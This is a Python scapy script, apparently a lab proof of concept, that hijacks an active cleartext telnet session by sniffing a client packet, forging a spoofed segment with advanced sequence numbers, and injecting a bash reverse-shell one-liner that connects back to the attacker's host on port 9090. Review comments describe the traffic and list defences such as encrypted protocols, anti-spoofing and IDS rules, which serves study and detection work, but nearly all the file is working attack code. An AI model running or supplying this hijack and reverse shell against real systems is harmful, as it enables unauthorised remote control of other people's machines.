- from scapy.all import *
- #Telnet session has to be already active. Listens for a telnet packet
- #sent from the client to the server. Will take the seq and acks numbers
- #of that packet and increment both by one. (Since a keypress will send one byte of data, the next packet should have seq+1)
- #This script is very basic and will not work if the spoofed client
- #command contains more than one byte of data.
- #So, log in to telnet from client. Run script on attacker, then press a key on client.
- #
- # NOTE(review): this is a TCP session-hijack / command-injection proof of
- # concept against a cleartext telnet session. The comments below describe
- # what the script puts on the wire and what a network owner can watch for.
- # The wildcard import is what brings IP, TCP, sniff and send into scope.
- #
- # Hard-coded lab values: the capture/send interface, the address of the
- # host running this script, and the address of the telnet client to spoof.
- my_iface="enp0s3"
- my_ip="10.0.2.15"
- victim_ip="10.0.2.4"
- # Injected telnet payload: carriage returns around a bash reverse-shell
- # one-liner that connects back to my_ip on port 9090. It travels as plain
- # telnet data, so the whole string is visible to any capture on the path
- # and is a direct match target for a network IDS rule on telnet payloads
- # containing "/dev/tcp/".
- tcp_data = "\r/bin/bash -i > /dev/tcp/" + my_ip + "/9090 0<&1 2>&1\r"
- # Capture exactly one packet on my_iface. The lfilter accepts any TCP
- # segment whose IP source is victim_ip -- it does not look at dport 23,
- # so any TCP traffic from that host satisfies it, not only the telnet
- # session the header comment assumes.
- t = sniff(iface=my_iface, count=1,
- lfilter=lambda x: x.haslayer(TCP)
- and x[IP].src == victim_ip)
- # sniff() returns a packet list; keep the single captured packet.
- t = t[0]
- # Copy the addressing and the current seq/ack numbers out of the sniffed
- # segment; these are what let the forged segment fit into the live stream.
- tcpdata = {
- 'src' : t[IP].src,
- 'dst' : t[IP].dst,
- 'sport' : t[TCP].sport,
- 'dport' : t[TCP].dport,
- 'seq' : t[TCP].seq,
- 'ack' : t[TCP].ack
- }
- # Forge a segment that claims to come from the victim client (src is the
- # sniffed packet's source, not this host's my_ip), with only the ACK flag
- # set and seq/ack each advanced by one. The +1 encodes the header
- # comment's one-byte-keypress assumption; if the sniffed segment carried a
- # different payload length the forged seq will not line up with what the
- # server expects next.
- # NOTE(review): controls that defeat this: an encrypted remote-access
- # protocol instead of telnet; IP source guard / anti-spoofing on the
- # access switch, since the IP source here is not the sending host's own
- # address; and IDS alerting on overlapping or duplicate TCP sequence
- # numbers for one flow (presumably arriving from two different link-layer
- # senders -- confirm with a capture).
- p = IP(src=tcpdata['src'], dst=tcpdata['dst']) / \
- TCP(sport=tcpdata['sport'], dport=tcpdata['dport'],
- flags="A", seq=tcpdata['seq']+1, ack=tcpdata['ack']+1) / tcp_data
- # Send at layer 3 on the chosen interface; verbose=1 lets scapy print its
- # send report.
- send(p, verbose=1, iface=my_iface)